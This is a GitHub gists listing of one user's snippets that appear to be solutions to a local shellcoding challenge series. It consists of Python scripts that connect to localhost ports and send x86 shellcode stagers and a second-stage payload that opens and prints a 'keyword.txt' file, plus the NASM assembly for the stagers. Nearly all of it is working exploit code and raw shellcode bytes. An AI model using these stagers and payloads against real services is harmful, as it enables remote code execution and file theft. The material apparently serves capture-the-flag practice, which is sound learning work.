Skip to content

Instantly share code, notes, and snippets.

View potetisensei's full-sized avatar

potetisensei

46 followers · 20 following
View GitHub Profile
@potetisensei
potetisensei / solve06.py
Created November 10, 2014 18:49
from socket import *
from struct import pack
p = socket(AF_INET, SOCK_STREAM)
p.connect(("localhost", 10006))
prefix = "\xf2\xf3" * 3
stager = ""
stager += prefix + "\x89\xc1"
stager += prefix + "\x31\xdb"
@potetisensei
potetisensei / solve07.py
Created November 10, 2014 18:48
from socket import *
from struct import pack
p = socket(AF_INET, SOCK_STREAM)
p.connect(("localhost", 10007))
prefix = "\xf2\xf3"
stager = ""
stager += prefix + "\x89\xc1"
stager += prefix + "\x31\xdb"
@potetisensei
potetisensei / solve04.py
Created November 10, 2014 18:40
from socket import *
from struct import pack
p = socket(AF_INET, SOCK_STREAM)
p.connect(("localhost", 10004))
stager = "\x89\xc1\x31\xdb\x6a\x03\x58\x6a\x7f\x5a\xc6\x41\x12\xcd\xc6\x41\x13\x80"
read_shellcode = "\x90" * 30 + "\x31\xc9\x51\x68\x74\x78\x74\x00\x68\x6f\x72\x64\x2e\x68\x6b\x65\x79\x77\x54\x5b\x6a\x05\x58\xcd\x80\x89\xc3\xb0\x03\x89\xe1\x81\xc1\xff\x00\x00\x00\x31\xd2\xb6\xff\xb2\xff\xcd\x80\x89\xc2\x6a\x04\x58\xb3\x01\xcd\x80"
p.send(pack("<I", len(stager)))
@potetisensei
potetisensei / adhoc04.s
Created November 10, 2014 18:40
BITS 32
mov ecx, eax
xor ebx, ebx
push BYTE 0x03
pop eax
push BYTE 0x7f
pop edx
mov byte [ecx+18], 0xcd
mov byte [ecx+19], 0x80
@potetisensei
potetisensei / solve11.py
Created November 10, 2014 18:36
p.connect(("localhost", 10011))
stager = "\x68\x7f\x5a\xcd\x80\x68\x6a\x03\x58\x6a\x68\x89\xe1\x31\xdb\x54\xc3"
read_shellcode = "\x90" * 30 + "\x31\xc9\x51\x68\x74\x78\x74\x00\x68\x6f\x72\x64\x2e\x68\x6b\x65\x79\x77\x54\x5b\x6a\x05\x58\xcd\x80\x89\xc3\xb0\x03\x89\xe1\x81\xc1\xff\x00\x00\x00\x31\xd2\xb6\xff\xb2\xff\xcd\x80\x89\xc2\x6a\x04\x58\xb3\x01\xcd\x80"
p.send(pack("<I", len(stager)))
p.send(stager)
p.send(read_shellcode)
print p.recv(1024)
@potetisensei
potetisensei / adhoc11.s
Created November 10, 2014 18:34
BITS 32
push 0x80cd5a7f
push 0x6a58036a
push 0xdb31e189
push esp
ret
@potetisensei
potetisensei / solve10.py
Created November 10, 2014 18:31
from socket import *
from struct import pack
p = socket(AF_INET, SOCK_STREAM)
p.connect(("localhost", 10010))
stager = "\x90\x90\x50\x31\xdb\x6a\x03\x58\x59\x6a\x7f\x5a\xcd\x80\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
read_shellcode = "\x90" * 30 + "\x31\xc9\x51\x68\x74\x78\x74\x00\x68\x6f\x72\x64\x2e\x68\x6b\x65\x79\x77\x54\x5b\x6a\x05\x58\xcd\x80\x89\xc3\xb0\x03\x89\xe1\x81\xc1\xff\x00\x00\x00\x31\xd2\xb6\xff\xb2\xff\xcd\x80\x89\xc2\x6a\x04\x58\xb3\x01\xcd\x80"
p.send(pack("<I", len(stager)))
@potetisensei
potetisensei / adhoc10.s
Created November 10, 2014 18:30
BITS 32
nop
nop
push eax
xor ebx, ebx
push BYTE 0x03
pop eax
pop ecx
@potetisensei
potetisensei / solve09.py
Created November 10, 2014 18:28
from socket import *
from struct import pack
p = socket(AF_INET, SOCK_STREAM)
p.connect(("localhost", 10009))
stager = "\x50\x31\xdb\x6a\x03\x58\x59\x6a\x7f\x5a\xcd\x80\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
read_shellcode = "\x90" * 30 + "\x31\xc9\x51\x68\x74\x78\x74\x00\x68\x6f\x72\x64\x2e\x68\x6b\x65\x79\x77\x54\x5b\x6a\x05\x58\xcd\x80\x89\xc3\xb0\x03\x89\xe1\x81\xc1\xff\x00\x00\x00\x31\xd2\xb6\xff\xb2\xff\xcd\x80\x89\xc2\x6a\x04\x58\xb3\x01\xcd\x80"
p.send(pack("<I", len(stager)))
@potetisensei
potetisensei / adhoc09.s
Created November 10, 2014 18:28
BITS 32
push eax
xor ebx, ebx
push BYTE 0x03
pop eax
pop ecx
push BYTE 0x7f
pop edx